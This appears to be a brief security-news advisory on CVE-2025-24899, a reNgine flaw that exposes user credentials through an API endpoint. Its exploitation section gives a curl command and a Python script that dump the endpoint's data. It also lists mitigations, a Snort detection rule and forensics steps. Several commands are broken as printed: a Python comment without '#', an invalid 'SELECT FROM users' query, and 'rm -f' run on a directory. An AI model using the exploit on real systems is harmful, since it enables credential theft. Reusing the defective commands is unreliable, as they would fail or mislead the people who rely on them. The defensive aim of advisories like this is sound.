reNgine, Information Disclosure, CVE-2025-24899 (Critical)

Listen to this Post

How CVE-2025-24899 Works

The vulnerability in reNgine allows an authenticated attacker with any role (e.g., Auditor, PenTester, or Sys Admin) to exploit an insecure API endpoint (/api/listVulnerability/). When fetching scan results, the backend improperly exposes sensitive user data, including credentials, emails, and activity logs. The flaw stems from missing role-based access control (RBAC) checks and excessive data exposure in API responses. Attackers can retrieve this information via a simple GET request, enabling further privilege escalation or credential reuse attacks.

DailyCVE Form

Platform: reNgine
Version: < 2.2.0
Vulnerability: Information Disclosure
Severity: Critical
Date: 05/13/2025

What Undercode Say:

Exploitation

1. Exploit Command (cURL):

curl -X GET "http://<target>/api/listVulnerability/" -H "Authorization: Bearer <attacker_token>"

2. Python Exploit Script:

import requests
headers = {"Authorization": "Bearer <attacker_token>"}
response = requests.get("http://<target>/api/listVulnerability/", headers=headers)
print(response.json()) Dumps sensitive data

Mitigation

1. Patch: Upgrade to reNgine v2.2.0+.

  1. Temporary Fix: Block unauthorized API access via WAF rules:
    location /api/listVulnerability/ {
    deny all;
    }
    

3. Audit RBAC:

grep -r "listVulnerability" /path/to/reNgine/code/

Detection

1. Log Analysis:

grep "GET /api/listVulnerability/" /var/log/nginx/access.log

2. IDS Rule (Snort):

alert tcp any any -> any 80 (msg:"reNgine CVE-2025-24899 Exploit"; content:"GET /api/listVulnerability/"; sid:1000001;)

Post-Exploit Forensics

1. Check Stolen Data:

sqlite3 /path/to/reNgine/db.sqlite3 "SELECT FROM users;"

2. Revoke Sessions:

rm -f /path/to/reNgine/sessions/

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

Join Our Cyber World:

💬 Whatsapp | 💬 TelegramFeatured Image

Scroll to Top